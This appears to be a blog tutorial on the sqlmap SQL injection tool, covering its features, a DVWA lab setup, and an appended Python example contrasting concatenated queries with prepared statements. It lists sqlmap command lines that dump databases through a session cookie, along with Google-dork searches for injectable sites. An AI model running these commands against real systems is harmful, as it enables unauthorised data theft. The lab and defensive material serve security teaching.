sqlmap: automated testing for SQL injection issues, returning version information and so on.
sqlmap is an open source, automated SQL injection tool written in Python, so running it requires a Python environment to be installed.
For more information on sqlmap you can visit the official sites: http://sqlmap.org/, https://github.com/sqlmapproject/sqlmap, https://www.python.org.
Note: sqlmap is only used to detect and exploit SQL injection points; it does not scan a site for vulnerabilities in general. Use a scanning tool to find the SQL injection point before using sqlmap.
Characteristics:
- Full support for a variety of database management systems: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix.
- Full support for boolean-based blind, time-based blind, error-based, UNION query, and stacked queries injection.
- Supports connecting directly to the database without going through a SQL injection point, given the database credentials, IP address, port, and database name.
- Supports enumeration of users, passwords, hashes, permissions, roles, databases, data tables, and columns.
- Supports automatic identification of password hash formats and cracking password hashes with a dictionary.
- Supports dumping a whole table from a database, only a few columns of a table, or even only part of the data in a column, depending entirely on the user's choice.
- Supports searching the database management system for a specified database name, table name, or column name.
- Support for downloading or uploading files when the database management system is MySQL, PostgreSQL, or Microsoft SQL Server.
- Supports executing arbitrary commands and returning their standard output when the database management system is MySQL, PostgreSQL, or Microsoft SQL Server.
Installing Sqlmap
1. Download Python and install it;
2. Download sqlmap and install it; note: add sqlmap to the PATH environment variable;
Running sqlmap requires Python 2.6 or 2.7; higher versions are not supported. Depressing ┭┮﹏┭┮
A quick note:
Run sqlmap.py directly
Seeing this interface shows that the installation was successful! Because the Python version I installed is too high, it will not run for me, so this is from earlier material on the official website.
Prepare the test target: DVWA, http://www.dvwa.co.uk/ (download the source code from GitHub)
Unzip it into the WWW root directory
Configure the vhost environment
Rename config.inc.php.dist ==> config.inc.php under the DVWA config directory
Modify the IP address, database user, password, and port number
Install DVWA
CSRF, XSS, SQL injection
Using sqlmap:
sqlmap.py -u "http://www.lingbook.com?test=lingbook" --cookie="phpsessid=11111111111111111"   (URL path)
sqlmap.py -r "Test.text"   (file name)
sqlmap.py -u "http://www.lingbook.com?test=lingbook" --cookie="phpsessid=11111111111111111" --dbs   (get the database names)
sqlmap.py -u "http://www.lingbook.com?test=lingbook" --cookie="phpsessid=11111111111111111" --tables   (get the table names)
sqlmap.py -u "http://www.lingbook.com?test=lingbook" --cookie="phpsessid=11111111111111111" --dump   (dump data)
sqlmap.py -u "http://www.lingbook.com?test=lingbook" --cookie="phpsessid=11111111111111111" --dump-all   (dump all data)
sqlmap.py -u "http://www.lingbook.com?test=lingbook" --cookie="phpsessid=11111111111111111" --data="Data stitching string" --dbs
sqlmap.py -u "http://www.lingbook.com?test=lingbook" --cookie="phpsessid=11111111111111111" --data="Data stitching string" --dbs --batch --smart   (automatically select yes)
sqlmap.py -g "inurl:www.lingbook.com"   (Google search; needs a way past the firewall to reach Google)
sqlmap.py -g "keywords" --batch --smart   (find injection points)
Web application firewall (WAF): hardware firewall, software firewall
Determines whether a request is malicious
ngx_lua.
White-hat code audit: parameter filtering, how the SQL is written
Three injection routes: GET, POST, header
select * from user where id=1'   (this statement throws an exception)
Special characters that make a statement throw an exception can lead to SQL injection
Precompilation (prepared statements), filtering
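The audit points above (a quote in the id value makes the concatenated statement throw; the fix is parameter filtering plus precompilation), shown side by side as an added example that is not part of the original article. It assumes Python's sqlite3 module with a constructed in-memory user table; the function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; the table name follows the page's example query.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return db

def lookup_concatenated(db, raw_id):
    """Audit finding: the request value is stitched into the SQL text."""
    sql = "SELECT id, name FROM user WHERE id=" + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # A quote in the input breaks the statement: the parser read the input as SQL.
        return "exception: " + type(exc).__name__

def lookup_prepared(db, raw_id):
    """Fix: filter the parameter, then bind it to a precompiled statement."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):  # parameter filtering: digits only
        return []
    # The ? placeholder keeps the value out of the SQL text entirely.
    sql = "SELECT id, name FROM user WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def audit(inputs):
    """Run each input through both forms and return the results side by side."""
    db = make_db()
    return {raw: (lookup_concatenated(db, raw), lookup_prepared(db, raw))
            for raw in inputs}

if __name__ == "__main__":
    # Constructed inputs: a normal id, the quote case from the page, a condition.
    for raw, (before, after) in audit(["1", "1'", "1 OR 1=1"]).items():
        print(repr(raw), "| concatenated:", before, "| prepared:", after)
```

In a code audit, any query built like lookup_concatenated is the finding, whether or not the current input happens to throw.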